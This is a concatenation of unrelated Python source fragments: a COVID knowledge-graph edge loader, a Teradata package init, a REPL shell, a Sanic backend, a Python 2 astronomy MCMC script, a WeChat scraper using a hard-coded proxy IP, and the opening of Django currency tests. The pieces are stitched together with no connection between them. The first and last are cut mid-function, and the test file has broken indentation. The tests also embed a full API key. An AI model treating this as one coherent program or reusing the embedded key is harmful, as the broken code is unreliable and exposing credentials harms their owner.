                                                'enrichment_p': float(line[SGEDGESDATACOLS.ENRICHMENT.value]),
                                                ORIGINAL_KNOWLEDGE_SOURCE: self.provenance_id},  # edge props
                                  comment_character=None,
                                  delim='\t',
                                  has_header_row=True)

        # parse the covid phenotypes file: every phenotype hangs off the covid node
        phenotypes_file: str = os.path.join(self.data_path, self.covid_phenotypes_file_name)
        with open(phenotypes_file, 'r') as fp:
            extractor.csv_extract(fp,
                                  lambda line: self.covid_node_id,  # subject id
                                  lambda line: line[PHENOTYPESDATACOLS.PHENOTYPE_ID.value],  # object id
                                  lambda line: self.has_phenotype_predicate,  # predicate extractor
                                  lambda line: {},  # subject props
                                  lambda line: {},  # object props
                                  lambda line: {'notes': line[PHENOTYPESDATACOLS.PHENOTYPE_NOTE.value],
                                                ORIGINAL_KNOWLEDGE_SOURCE: self.provenance_id,
                                                AGGREGATOR_KNOWLEDGE_SOURCES: [self.provenance_id]},  # edge props
                                  comment_character=None,
                                  delim=',',
                                  has_header_row=True)

        # parse the drug bank trials file
        trials_file: str = os.path.join(self.data_path, self.drug_bank_trials_file_name)
        with open(trials_file, 'r') as fp:
            extractor.csv_extract(fp,
                                  lambda line: line[TRIALSDATACOLS.DRUG_ID.value],  # subject id
                                  lambda line: line[TRIALSDATACOLS.TARGET_ID.value],  # object id
                                  lambda line: f'ROBOKOVID:{line[TRIALSDATACOLS.PREDICATE.value]}',  # predicate extractor
                                  lambda line: {},  # subject props
                                  lambda line: {},  # object props
                                  lambda line: {'count': line[TRIALSDATACOLS.COUNT.value],
                                                ORIGINAL_KNOWLEDGE_SOURCE: 'infores:drugbank'},  # edge props
                                  comment_character=None,
                                  delim='\t',
                                  has_header_row=True)

        self.final_node_list = extractor.nodes
        self.final_edge_list = extractor.edges

        self._mirror_covid_edges()

        return extractor.load_metadata

    def _mirror_covid_edges(self) -> None:
        """Duplicate edges between the COVID-19 disease node and the SARS-CoV-2 taxon node.

        Every edge attached to one of the two identifiers gets a deep-copied twin
        attached to the other, so either form of the concept is connected.
        Self-loops produced by the swap are dropped.
        """
        covid_disease_id = 'MONDO:0100096'
        coronavirus_taxon_id = 'NCBITaxon:2697049'
        edges_to_add = []
        for edge in self.final_edge_list:
            new_edge = None
            # BUGFIX: these four swaps previously used '==' (a no-op comparison),
            # so unmodified duplicate edges were appended instead of mirrored ones.
            if edge.subjectid == covid_disease_id:
                new_edge = deepcopy(edge)
                new_edge.subjectid = coronavirus_taxon_id
            elif edge.objectid == covid_disease_id:
                new_edge = deepcopy(edge)
                new_edge.objectid = coronavirus_taxon_id
            elif edge.subjectid == coronavirus_taxon_id:
                new_edge = deepcopy(edge)
                new_edge.subjectid = covid_disease_id
            elif edge.objectid == coronavirus_taxon_id:
                new_edge = deepcopy(edge)
                new_edge.objectid = covid_disease_id
            if new_edge and new_edge.subjectid != new_edge.objectid:
                edges_to_add.append(new_edge)
        self.final_edge_list.extend(edges_to_add)
|
# -*- coding: utf-8 -*-
import os
# absolute paths derived from this package's location on disk:
# PYTHON_MODULE_PATH is the directory two levels above this file, ROOT_PATH its parent
PYTHON_MODULE_PATH = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
ROOT_PATH = os.path.dirname(PYTHON_MODULE_PATH)
# re-export the tool classes so callers can do `from <pkg> import Teradata` etc.
from tools.td_tools import Teradata
from tools.json_tools import JsonConf
from tools.email_tools import EmailTools
from tools.td_odbc_tools import Teradata as TeradataOdbc
# explicit public API of this package
__all__ = ['Teradata', 'JsonConf', 'EmailTools', 'TeradataOdbc']
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# Author: wxnacy@gmail.com
"""
"""
import sys
import os
import argparse
import shutil
import traceback
import pygments
from datetime import datetime
from pygments.token import Token
from pygments.lexers.python import PythonLexer
from prompt_toolkit.formatted_text import PygmentsTokens
from prompt_toolkit import print_formatted_text
from prompt_toolkit import PromptSession
from prompt_toolkit.application import run_in_terminal
from prompt_toolkit.history import FileHistory
from prompt_toolkit.auto_suggest import AutoSuggestFromHistory
from wpy.argument import CommandArgumentParser
from wpy.argument import CommandArgumentParserFactory
from .errors import ContinueError
from .errors import CommnadNotFoundError
class CommandShell():
    """Interactive REPL built on prompt_toolkit.

    Reads lines in a loop, dispatches them to argument parsers produced by
    CommandArgumentParserFactory, and supports `!N` history recall (which
    pre-fills the next prompt with history entry N instead of executing it).
    """

    # NOTE: class-level dict is shared by all instances (parser cache)
    parser_dict = {}
    parser = None
    _prompt_default = ''   # text pre-filled into the next prompt (history recall)
    session = None
    HISTORY_PATH = os.path.expanduser('~/.wpy_history')

    def __init__(self):
        self.parser = self._get_parser()
        self.session = PromptSession(
            # completer=CommandCompleter(self.parser, client),
            history = FileHistory(self.HISTORY_PATH),
            auto_suggest = AutoSuggestFromHistory(),
            complete_in_thread=True
        )

    def _get_parser(self, cmd=None):
        """Return (and cache) the argument parser for `cmd`."""
        if cmd not in self.parser_dict:
            parser = CommandArgumentParserFactory.build_parser(cmd)
            parser.set_prompt(self.session)
            self.parser_dict[cmd] = parser
        return self.parser_dict[cmd]

    def run(self):
        self._run_shell()

    def get_left_prompt(self):
        return 'wpy> '

    def get_right_prompt(self):
        return ''

    def _run_shell(self):
        """Main read-eval loop; exits on EOF (Ctrl-D)."""
        while True:
            # bind text up front so error reporting below never hits an unbound name
            text = ''
            try:
                text = self.session.prompt(
                    self.get_left_prompt(),
                    default = self._prompt_default,
                    rprompt = self.get_right_prompt(),
                )
                self._run_once_time(text)
            except ContinueError:
                # skip _end_run so a recalled history entry survives to the next prompt
                continue
            except CommnadNotFoundError:
                print('command not found: {}'.format(text))
            except KeyboardInterrupt:
                continue
            except EOFError:
                break
            except Exception as e:
                self._print('ERROR: ' + str(e))
            self._end_run()
        # print('GoodBye!')

    def _end_run(self):
        # clear any pending history-recall text once a command completed normally
        self._prompt_default = ''

    def _run_once_time(self, text):
        """Run a single input line."""
        if not text:
            return
        self.parser = self._get_parser(text)
        self._run_base_cmd(text)
        if isinstance(self.parser, CommandArgumentParser):
            self.parser.run(text)
            return
        # fall back to a `_<cmd>` method on the shell itself (e.g. `_exit`)
        # BUGFIX: `cmd` was previously undefined here and the raise referenced a
        # non-existent CommnadNotFoundException class.
        cmd = text.split()[0]
        if not hasattr(self, '_' + cmd):
            raise CommnadNotFoundError()
        func = getattr(self, '_' + cmd)
        func(text)

    def _run_base_cmd(self, text):
        """Handle shell built-ins: `!N` recalls history entry N into the next prompt."""
        if text.startswith('!'):
            text = text[1:]
            # narrow the previous bare `except:` — only a non-integer suffix is a
            # "command not found"; other errors should surface normally
            try:
                history_num = int(text)
            except ValueError:
                raise CommnadNotFoundError()
            cmd = self.get_history_by_num(history_num)
            if cmd is None:
                # out-of-range history index: treat like an unknown command rather
                # than pre-filling the prompt with None
                raise CommnadNotFoundError()
            self._prompt_default = cmd
            # success: abort normal dispatch so the recalled command is shown in
            # the next prompt instead of the literal `!N` being executed
            raise ContinueError()

    def _exit(self, text):
        raise EOFError()

    def get_history_by_num(self, num):
        """Return history entry `num` (1-based) or None when out of range."""
        items = self.session.history.get_strings()
        # guard num < 1 as well: a negative index would silently wrap around
        if num < 1 or len(items) < num:
            return None
        return items[num - 1]

    def _print(self, text):
        # syntax-highlight the text as python before printing it
        tokens = list(pygments.lex(text, lexer=PythonLexer()))
        print_formatted_text(PygmentsTokens(tokens), end='')
|
from sanic import Sanic
import os
import asyncio
import logging
from sanic.request import Request
from sanic import response, HTTPResponse, Blueprint
from sanic.exceptions import SanicException
import httpx
from typing import Optional, Any
from . import get_cur_user
from ..logic import Worker
from ..state import User
from .. import utils
from .. import secret
# timeout (seconds) for outbound OAuth HTTP requests made via the shared client
OAUTH_HTTP_TIMEOUT = 20
# workaround applied before creating the app (see utils for details)
utils.fix_zmq_asyncio_windows()
app = Sanic('guiding-star-backend')
app.config.DEBUG = False
# disable automatic OpenAPI spec generation
app.config.OAS = False
app.config.KEEP_ALIVE_TIMEOUT = 15
# request size cap: 1 MiB headroom plus the configured writeup upload limit
app.config.REQUEST_MAX_SIZE = 1024*1024*(1+secret.WRITEUP_MAX_SIZE_MB)
# sanic-ext dependency injection: handlers may declare parameters of these types
app.ext.add_dependency(Worker, lambda req: req.app.ctx.worker)
app.ext.add_dependency(httpx.AsyncClient, lambda req: req.app.ctx.oauth_http_client)
app.ext.add_dependency(Optional[User], get_cur_user)
@app.before_server_start
async def setup_game_state(cur_app: Sanic, _loop: Any) -> None:
    """Per-process startup: create the Worker, start its message loop, and build the shared OAuth HTTP client."""
    logging.getLogger('sanic.root').setLevel(logging.INFO)
    # one Worker per sanic worker process; name comes from config or falls back to the pid
    worker = Worker(cur_app.config.get('WORKER_NAME', f'worker-{os.getpid()}'), receiving_messages=True)
    cur_app.ctx.worker = worker
    await worker._before_run()
    # keep a reference on ctx so the mainloop task is not garbage collected
    cur_app.ctx._worker_task = asyncio.create_task(worker._mainloop())
    cur_app.ctx.oauth_http_client = httpx.AsyncClient( # type: ignore
        http2=True,
        proxies=secret.OAUTH_HTTP_PROXIES,
        timeout=OAUTH_HTTP_TIMEOUT,
    )
async def handle_error(req: Request, exc: Exception) -> HTTPResponse:
    """Catch-all error handler: log unexpected exceptions and return a generic 500 page."""
    # SanicExceptions (aborts, 4xx, etc.) keep sanic's normal handling
    if isinstance(exc, SanicException):
        raise exc
    try:
        # NOTE(review): get_cur_user is also registered as a dependency provider;
        # it is called synchronously here — confirm it is not a coroutine function.
        user = get_cur_user(req)
        debug_info = f'{req.id} {req.uri_template} U#{"--" if user is None else user._store.id}'
    except Exception as e:
        # never let debug-info collection mask the original error
        debug_info = f'no debug info, {repr(e)}'
    req.app.ctx.worker.log('error', 'app.handle_error', f'exception in request ({debug_info}): {utils.get_traceback(exc)}')
    return response.html(
        '<!doctype html>'
        '<h1>🤡 500 — Internal Server Error</h1>'
        '<p>This accident is recorded.</p>'
        f'<p>If you believe there is a bug, tell admin about this request ID: {req.id}</p>'
        '<br>'
        '<p>😭 <i>Project Guiding Star</i></p>',
        status=500
    )
# register the catch-all handler for any non-Sanic exception
app.error_handler.add(Exception, handle_error)
# endpoint modules are imported late so their blueprints see the configured `app`
from .endpoint import auth
from .endpoint import wish
from .endpoint import template
from .endpoint import ws
# all service endpoints are grouped under the /service url prefix
svc = Blueprint.group(auth.bp, wish.bp, template.bp, ws.bp, url_prefix='/service')
app.blueprint(svc)
def start(idx0: int, worker_name: str) -> None:
    """Entry point for one API server process: record the worker name and run sanic."""
    app.config.WORKER_NAME = worker_name
    # WORKER_API_SERVER_KWARGS supplies the per-worker-index server kwargs (host/port etc.)
    app.run(**secret.WORKER_API_SERVER_KWARGS(idx0), workers=1) # type: ignore
import sys
import argparse as ap
import numpy as np
import os.path as op
import logging
from astropy.table import Table
from lumfuncmcmc import LumFuncMCMC
import VmaxLumFunc as V
from scipy.optimize import fsolve
import configLF
from distutils.dir_util import mkpath
def setup_logging():
    '''Setup Logging for LumFuncMCMC, which allows us to track status of calls and
    when errors/warnings occur.

    The shared "lumfuncmcmc" logger is configured only on the first call: a
    stream handler at INFO level with a timestamped format is attached and the
    logger level is set to DEBUG. Later calls return the same logger untouched.

    Returns
    -------
    log : class
        log.info() is for general print and log.error() is for raise cases
    '''
    log = logging.getLogger('lumfuncmcmc')
    if log.handlers:
        # already configured by an earlier call
        return log
    stream_handler = logging.StreamHandler()
    stream_handler.setFormatter(
        logging.Formatter('[%(levelname)s - %(asctime)s] %(message)s'))
    stream_handler.setLevel(logging.INFO)
    log.setLevel(logging.DEBUG)
    log.addHandler(stream_handler)
    return log
def parse_args(argv=None):
    '''Parse arguments from commandline or a manually passed list

    Parameters
    ----------
    argv : list
        list of strings such as ['-f', 'input_file.txt', '-s', 'default.ssp']

    Returns
    -------
    args : class
        args class has attributes of each input, i.e., args.filename
        as well as attributes from the config file
    '''
    parser = ap.ArgumentParser(description="LumFuncMCMC",
                               formatter_class=ap.RawTextHelpFormatter)

    parser.add_argument("-f", "--filename",
                        help='''File to be read for galaxy data''',
                        type=str, default=None)

    parser.add_argument("-o", "--output_filename",
                        help='''Output filename for given run''',
                        type=str, default='test.dat')

    parser.add_argument("-nw", "--nwalkers",
                        help='''Number of walkers for EMCEE''',
                        type=int, default=None)

    parser.add_argument("-ns", "--nsteps",
                        help='''Number of steps for EMCEE''',
                        type=int, default=None)

    parser.add_argument("-nbins", "--nbins",
                        help='''Number of bins for evaluating
                        true measured luminosity function from V_eff method''',
                        type=int, default=None)

    parser.add_argument("-nboot", "--nboot",
                        help='''Number of bootstrap iterations for V_eff method''',
                        type=int, default=None)

    parser.add_argument("-o0", "--Omega_0",
                        help='''Effective survey area in square arcseconds''',
                        type=float, default=None)

    parser.add_argument("-mcf", "--min_comp_frac",
                        help='''Minimum completeness fraction considered''',
                        type=float, default=None)

    # BUGFIX: the help texts for -al and -fl were copy-pasted from -mcf
    parser.add_argument("-al", "--alpha",
                        help='''Completeness-curve alpha parameter''',
                        type=float, default=None)

    parser.add_argument("-fl", "--Flim",
                        help='''Completeness-curve flux limit parameter (Flim)''',
                        type=float, default=None)

    parser.add_argument("-ln", "--line_name",
                        help='''Name of line or band for LF measurement''',
                        type=str, default=None)

    # Initialize arguments and log
    args = parser.parse_args(args=argv)
    args.log = setup_logging()

    # Use config values if none are set in the input
    arg_inputs = ['nwalkers','nsteps','nbins','nboot','Flim','alpha','line_name','line_plot_name','Omega_0','sch_al','sch_al_lims','Lstar','Lstar_lims','phistar','phistar_lims','Lc','Lh',
                  'min_comp_frac', 'param_percentiles', 'output_dict']
    for arg_i in arg_inputs:
        try:
            # fall back to configLF when the CLI left the value unset (None/0)
            if getattr(args, arg_i) in [None, 0]:
                setattr(args, arg_i, getattr(configLF, arg_i))
        except AttributeError:
            # attribute only exists in the config file, not as a CLI option
            setattr(args, arg_i, getattr(configLF, arg_i))

    # pretty plotting label for the chosen line
    if args.line_name=='OIII':
        args.line_plot_name = r'[OIII] $\lambda 5007$'
    if args.line_name=='Ha':
        args.line_plot_name = r'${\rm{H\alpha}}$'

    return args
def read_input_file(args):
    """ Function to read in input ascii file with properly named columns.
    Columns should include redshifts (header 'z') and a (linear) flux (header
    'LineorBandName_flux') in 1.0e-17 erg/cm^2/s or log luminosity (header
    'LineorBandName_lum') in log erg/s. Errors can be included with headers
    'LineorBandName_flux_e' or 'LineorBandName_lum_e', with the same units.

    Input
    -----
    args : class
        The args class is carried from function to function with information
        from command line input and config.py

    Return
    ------
    z: Numpy 1-D Array
        Source redshifts
    flux: Numpy 1-D Array
        Source fluxes (1.0e-17 erg/cm^2/s or None if not in input file)
    flux_e: Numpy 1-D Array
        Source flux errors (1.0e-17 erg/cm^2/s or None if not in input file)
    lum: Numpy 1-D Array
        Source log luminosities (log erg/s or None if not in input file)
    lum_e: Numpy 1-D Array
        Source log luminosity errors (log erg/s or None if not in input file)
    root: Float
        Minimum flux cutoff based on the completeness curve parameters and desired minimum completeness
    """
    datfile = Table.read(args.filename,format='ascii')
    z = datfile['z']
    # translate the minimum completeness fraction into a minimum flux by
    # inverting the completeness curve p(F; Flim, alpha); mcf==0 means no cut
    if abs(args.min_comp_frac-0.0)<1.0e-6:
        root = 0.0
    else:
        root = fsolve(lambda x: V.p(x,args.Flim,args.alpha)-args.min_comp_frac,[args.Flim])[0]
    # BUGFIX: `cond` used to be unbound when neither a flux nor a lum column was
    # usable, crashing at `z = z[cond]` below; default to keeping every source
    cond = np.ones(len(z), dtype=bool)
    try:
        flux = datfile['%s_flux'%(args.line_name)]
        # heuristic: large values mean the column is in cgs units rather than
        # the 1e-17-scaled convention, so the cutoff must be rescaled to match
        if max(flux)>1.0e-5:
            cond = flux>1.0e17*root
        else:
            cond = flux>root
        flux_e = datfile['%s_flux_e'%(args.line_name)]
        flux, flux_e = flux[cond], flux_e[cond]
    except KeyError:
        # narrowed from a bare except: a missing column raises KeyError
        flux, flux_e = None, None
    if '%s_lum'%(args.line_name) in datfile.columns:
        lum = datfile['%s_lum'%(args.line_name)]
        DL = np.zeros(len(z))
        for i,zi in enumerate(z):
            DL[i] = V.dLz(zi)
        # convert log-luminosity back to flux (3.086e24 cm/Mpc) to apply the cut
        lumflux = 10**lum/(4.0*np.pi*(DL*3.086e24)**2)
        cond = lumflux>root
        lum = lum[cond]
        if '%s_lum_e'%(args.line_name) in datfile.columns:
            # BUGFIX: previously read the '%s_lum' column again instead of '%s_lum_e'
            lum_e = datfile['%s_lum_e'%(args.line_name)][cond]
        else:
            lum_e = None
    else:
        lum, lum_e = None, None
    z = z[cond]
    return z, flux, flux_e, lum, lum_e, root
def main(argv=None):
    """ Read input file, run luminosity function routine, and create the appropriate output """
    # NOTE(review): this script uses python-2 print statements; it will not run under python 3
    # Make output folder if it doesn't exist
    mkpath('LFMCMCOut')
    # Get Inputs
    if argv == None:
        argv = sys.argv
        # drop the script name so parse_args only sees real options
        argv.remove('run_lumfuncmcmc.py')
    args = parse_args(argv)
    # Read input file into arrays
    z, flux, flux_e, lum, lum_e, root = read_input_file(args)
    print "Read Input File"
    # Initialize LumFuncMCMC class
    LFmod = LumFuncMCMC(z, flux=flux, flux_e=flux_e, lum=lum, lum_e=lum_e,
                        Flim=args.Flim, alpha=args.alpha, line_name=args.line_name,
                        line_plot_name=args.line_plot_name, Omega_0=args.Omega_0,
                        nbins=args.nbins, nboot=args.nboot, sch_al=args.sch_al,
                        sch_al_lims=args.sch_al_lims, Lstar=args.Lstar,
                        Lstar_lims=args.Lstar_lims, phistar=args.phistar,
                        phistar_lims=args.phistar_lims, Lc=args.Lc, Lh=args.Lh,
                        nwalkers=args.nwalkers, nsteps=args.nsteps, root=root)
    print "Initialized LumFuncMCMC class"
    # Build names for parameters and labels for table
    names = LFmod.get_param_names()
    percentiles = args.param_percentiles
    labels = ['Line']
    for name in names:
        # one table column per parameter/percentile combination, e.g. Lstar_16
        labels = labels + [name + '_%02d' % per for per in percentiles]
    formats = {}
    for label in labels:
        formats[label] = '%0.3f'
    formats['Line'] = '%s'
    # first column is a string (line name), the rest are floats
    LFmod.table = Table(names=labels, dtype=['S10'] +
                        ['f8']*(len(labels)-1))
    print "Finished making names and labels for LF table and about to start fitting the model!"
    #### Run the actual model!!! ####
    LFmod.fit_model()
    print "Finished fitting model and about to create outputs"
    #### Get desired outputs ####
    if args.output_dict['triangle plot']:
        LFmod.triangle_plot('LFMCMCOut/triangle_%s_nb%d_nw%d_ns%d_mcf%d' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)), imgtype = args.output_dict['image format'])
        print "Finished making Triangle Plot with Best-fit LF (and V_eff-method-based data)"
    else:
        # NOTE(review): presumably triangle_plot sets the median fit internally,
        # so it is only done explicitly when the plot is skipped — confirm
        LFmod.set_median_fit()
        print "Finished setting median fit and V_eff parameters"
    names.append('Ln Prob')
    if args.output_dict['fitposterior']:
        # full posterior sample chain, one column per parameter plus ln-prob
        T = Table(LFmod.samples, names=names)
        T.write('LFMCMCOut/fitposterior_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
                overwrite=True, format='ascii.fixed_width_two_line')
        print "Finished writing fitposterior file"
    if args.output_dict['bestfitLF']:
        T = Table([LFmod.lum, LFmod.lum_e, LFmod.medianLF],
                  names=['Luminosity', 'Luminosity_Err', 'MedianLF'])
        T.write('LFMCMCOut/bestfitLF_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
                overwrite=True, format='ascii.fixed_width_two_line')
        print "Finished writing bestfitLF file"
    if args.output_dict['VeffLF']:
        # binned LF from the V_eff method with bootstrap errors
        T = Table([LFmod.Lavg, LFmod.lfbinorig, np.sqrt(LFmod.var)],
                  names=['Luminosity', 'BinLF', 'BinLFErr'])
        T.write('LFMCMCOut/VeffLF_%s_nb%d_nw%d_ns%d_mcf%d.dat' % (args.output_filename.split('.')[0], args.nbins, args.nwalkers, args.nsteps, int(100*args.min_comp_frac)),
                overwrite=True, format='ascii.fixed_width_two_line')
        print "Finished writing VeffLF file"
    # placeholder row that add_fitinfo_to_table fills with the fitted percentiles
    LFmod.table.add_row([args.line_name] + [0.]*(len(labels)-1))
    LFmod.add_fitinfo_to_table(percentiles)
    print(LFmod.table)
    if args.output_dict['parameters']:
        LFmod.table.write('LFMCMCOut/%s' % args.output_filename,
                          format='ascii.fixed_width_two_line',
                          formats=formats, overwrite=True)
        print "Finished writing LF main table"
    if args.output_dict['settings']:
        # dump the (logger-stripped) arguments dict next to the results
        filename = open('LFMCMCOut/%s.args' % args.output_filename, 'w')
        del args.log
        filename.write( str( vars(args) ) )
        filename.close()
        print "Finished writing settings to file"
if __name__ == '__main__':
    # script entry point (python 2 only — see print statements in main)
    main()
#coding:utf-8
#------requirement------
#lxml-3.2.1
#numpy-1.15.2
#------requirement------
import sys
# Py2-only trick: reload(sys) restores setdefaultencoding (removed by site.py)
# so all implicit str/unicode conversions use utf8
reload(sys)
sys.setdefaultencoding('utf8')
from lxml import etree
import re
import datetime
import urlparse
import gc
# make the spider middlewares importable from the repo checkout location
sys.path.append("/home/dev/Repository/news/Tegenaria/tSpider/tSpider/")
from browserRequest_weixin import BrowserRequest
from settings import Settings
from middlewares.fileIOMiddleware import FileIOMiddleware
from middlewares.doraemonMiddleware import Doraemon
from middlewares.requestsMiddleware import RequestsMiddleware
class Weixin():
    """Python-2 spider that scrapes article links from WeChat (weixin) account
    pages via a headless browser and stores new articles into MongoDB.
    Driven by start_requests()."""

    def __init__(self):
        self.settings = Settings()
        self.getSettings()
        self.file = FileIOMiddleware()
        self.request = RequestsMiddleware()
        self.doraemon = Doraemon()
        # make sure working/log directories exist before anything is logged
        self.doraemon.createFilePath(self.work_path_prd2)
        self.doraemon.createFilePath(self.log_path)

    def getSettings(self):
        """Copy the 'weixin' settings bundle onto instance attributes."""
        settings_name = self.settings.CreateSettings('weixin')
        self.source = settings_name['SOURCE_NAME']
        self.work_path_prd2 = settings_name['WORK_PATH_PRD2']
        self.mongo = settings_name['MONGO_URLS']
        self.name = settings_name['NAME']
        self.max_pool_size = settings_name['MAX_POOL_SIZE']
        self.log_path = self.settings.LOG_PATH_PRD2
        self.urls = settings_name['URLS']
        self.restart_path = settings_name['RESTART_PATH']
        self.restart_interval = settings_name['RESTART_INTERVAL']
        self.today = self.settings.TODAY
        # article urls look like /s?timestamp=...&src=...&ver=...&signature=...
        self.regx = re.compile("/s\?timestamp=[0-9]{0,}&src=[0-9]{0,}&ver=[0-9]{0,}&signature=(.*?)")

    def parse(self, response):
        """Callback per fetched account page: extract article links, store new ones.

        NOTE(review): relies on self.badkeys/self.goodkeys being assigned by
        start_requests() first — confirm parse is never invoked directly.
        """
        if len(response['response']) == 0:
            print 'ip is blocked'
            return
        current_url = response['response'].current_url.encode('gbk')
        weixinId = response['request_title'].encode('gbk')
        print 'Start to parse: {0}'.format(current_url)
        html = etree.HTML(response['response'].page_source)
        href_items = html.xpath(".//*[contains(@class,'weui_media_bd')]")
        for item in href_items:
            href = item.xpath(".//*[contains(@class,'weui_media_title')]/@hrefs")
            if len(href) == 0:
                # NOTE(review): `return` aborts the whole page on the first item
                # without a link (the duplicate len check below with `continue`
                # is unreachable) — possibly `continue` was intended; confirm.
                print 'Url is empty'
                return
            valid = True
            if len(href) == 0:
                continue
            href_url = href[0]
            isValidUrl = self.regx.match(href_url)
            if isValidUrl is None:
                print 'Invalid url for not match: {0}'.format(href_url)
                continue
            # NOTE(review): `valid` starts True, so this goodkeys pass is a no-op;
            # presumably valid should start False when goodkeys is non-empty.
            for good in self.goodkeys:
                if valid == True:
                    continue
                if good in href_url:
                    valid = True
            # any badkey occurrence rejects the url
            for bad in self.badkeys:
                if valid == False:
                    continue
                if bad in href_url:
                    valid = False
            if valid:
                # everything after 'signature=' serves as the article id
                short_url_parts = re.split(r'signature=', href_url)
                id = ''.join(short_url_parts[1]).strip()
                p_time = item.xpath(".//*[contains(@class,'weui_media_extra_info')]/text()")
                url = urlparse.urljoin(current_url, href_url)
                is_p_time_missing = False
                if self.doraemon.isEmpty(str(p_time)):
                    is_p_time_missing = True
                    self.file.logger(self.log_path, 'publish time missing for {0}'.format(current_url))
                    # NOTE(review): short_url_parts was split on 'signature=' and
                    # holds url fragments, so .index('timestamp') raises ValueError;
                    # this timestamp fallback looks broken — confirm and fix.
                    p_time = int(short_url_parts[short_url_parts.index('timestamp') + 1])
                    p_time = datetime.datetime.fromtimestamp(p_time).strftime("%Y-%m-%d")
                p_time = ''.join(p_time).strip()
                publish_time = self.doraemon.getDateFromString(p_time)
                title = item.xpath(".//*[contains(@class,'weui_media_title')]/text()")
                title = ''.join(title).strip()
                is_title_empty = self.doraemon.isEmpty(title)
                # dedupe on title; only store articles published today for accounts
                # that have not been marked finished yet
                if (is_title_empty is False) and (self.doraemon.isDuplicated(self.doraemon.bf_weixin_url, title) is False):
                    if self.doraemon.isFinished(self.doraemon.bf_weixin_id, weixinId) is False and is_p_time_missing is False and publish_time == self.today:
                        self.doraemon.storeFinished(self.doraemon.bf_weixin_id, weixinId)
                        data = {
                            'title': title,
                            'url': url,
                            'id': id,
                            'download_time': self.today,
                            'publish_time': publish_time,
                            'source': self.source
                        }
                        self.file.logger(self.log_path, 'Start to store mongo {0}'.format(data['url']))
                        print 'Start to store mongo {0}'.format(data['url'])
                        self.doraemon.storeMongodb(self.mongo, data)
                        self.file.logger(self.log_path, 'End to store mongo {0}'.format(data['url']))
                        print 'End to store mongo {0}'.format(data['url'])
                        self.file.logger(self.log_path, 'Done for {0}'.format(url))
                else:
                    if is_title_empty is True:
                        self.file.logger(self.log_path, 'Empty title for {0}'.format(url))
                        print 'Empty title for {0}'.format(url)
                    print 'Finished or Empty title for {0}'.format(url)
            else:
                self.file.logger(self.log_path, 'Invalid {0}'.format(current_url))
                print 'Invalid {0}'.format(current_url)
        print 'End to parse {0}'.format(current_url)
        # NOTE(review): title/url/id/data/short_url_parts are only bound when at
        # least one valid item was processed; otherwise this del raises NameError.
        del current_url, html, title, url, id, data, short_url_parts
        gc.collect()

    def start_requests(self):
        """Entry point: read account ids from file and crawl the unfinished ones."""
        # throttle restarts: bail out unless enough time passed since the last run
        if self.doraemon.isExceedRestartInterval(self.restart_path, self.restart_interval) is False:
            return
        self.file.logger(self.log_path, 'Start {0} requests'.format(self.name))
        print 'Start {0} requests'.format(self.name)
        # keyword filters consumed by parse(); currently no filtering configured
        self.badkeys = []
        self.goodkeys = []
        new_urls = []
        content = self.file.readFromTxt(self.urls)
        id_list = content.strip().split('\n')
        for id in id_list:
            if self.doraemon.isEmpty(id) is False and self.doraemon.isFinished(self.doraemon.bf_weixin_id, id) is False:
                new_urls.append([id, id])
        if len(new_urls) == 0:
            print 'No url.'
            return
        self.file.logger(self.log_path, 'There is {0} weixin requests to do.'.format(str(len(new_urls))))
        request = BrowserRequest()
        # hard-coded proxy address for the headless chrome fetches
        content = request.start_chrome(new_urls, self.max_pool_size, self.log_path, '121.234.244.59:30101', callback=self.parse)
        self.file.logger(self.log_path, 'End for {0} requests of {1}.'.format(str(len(content)), self.name))
        print 'End for {0} requests of {1}.'.format(str(len(content)), self.name)
        del new_urls, content, id_list, request
        gc.collect()
if __name__ == '__main__':
    # NOTE(review): rebinding the class name to an instance ("Weixin=Weixin()")
    # makes the class unreachable afterwards; works, but a distinct name would be clearer
    Weixin=Weixin()
    Weixin.start_requests()
# -*- coding: utf-8 -*-
"""
Various test cases for the `currencies` and `updatecurrencies` management commands
"""
from __future__ import unicode_literals
import re, os, sys
from decimal import Decimal
from datetime import datetime, timedelta
from functools import wraps
if sys.version_info.major >= 3:
from unittest.mock import patch, MagicMock
else:
from mock import patch, MagicMock
from django import template
from django.test import TestCase, override_settings
from django.core.management import call_command
from django.core.exceptions import ImproperlyConfigured
from six import StringIO
from currencies.models import Currency
from currencies.utils import calculate
# directory containing this test module (used to locate fixture files)
cwd = os.path.abspath(os.path.dirname(__file__))
default_settings = {
    # NOTE(review): hard-coded openexchangerates.org App ID committed to the repo;
    # presumably a throwaway test key — confirm it should live here
    "OPENEXCHANGERATES_APP_ID": "c2b2efcb306e075d9c2f2d0b614119ea",
}
def fromisoformat(s):
    """
    Hacky way to recover a datetime from an isoformat() string
    Python 3.7 implements datetime.fromisoformat() which is the proper way
    There are many other 3rd party modules out there, but should be good enough for testing
    """
    # raw string: '\d' in a plain literal is an invalid escape sequence
    # (DeprecationWarning, a SyntaxError in future Python versions)
    return datetime(*map(int, re.findall(r'\d+', s)))
# Mock get requests instead of hammering the API's
def mock_requestget_response(filename):
    "Returns a mock get response with the contents of a file"
    # Read the payload up front to guard against reading from & writing to the same file
    with open(filename, 'rb') as src:
        payload = src.read()

    def _json_from_payload(*args, **kwargs):
        import json
        # Supply a default encoding for python 2.7
        return json.loads(payload.decode('utf-8'), *args, **kwargs)

    getmock = MagicMock()
    canned_response = getmock.return_value
    canned_response.raise_for_status.return_value = None
    canned_response.json.side_effect = _json_from_payload
    canned_response.content = payload
    return getmock
# Mock helper function for oxr rates support without a valid API key for testing
def mock_requestsession_getjson(filename):
    "Sets up the mock session instance to return a fixed json rates file"
    session_cls = MagicMock()
    # Session() yields the instance whose .get serves the canned file contents
    session_cls.return_value.get = mock_requestget_response(filename)
    return session_cls
# Mock request exception helpers for simulating connectivity problems
def mock_requestget_exception():
    "Sets up the mock get instance to raise a Request exception"
    from requests.exceptions import RequestException
    failing_get = MagicMock()
    # any call to the mock raises, simulating a connectivity problem
    failing_get.side_effect = RequestException('Mocked Exception')
    return failing_get
def mock_requestsession_getexception():
    "Sets up the mock session instance to raise a Request exception"
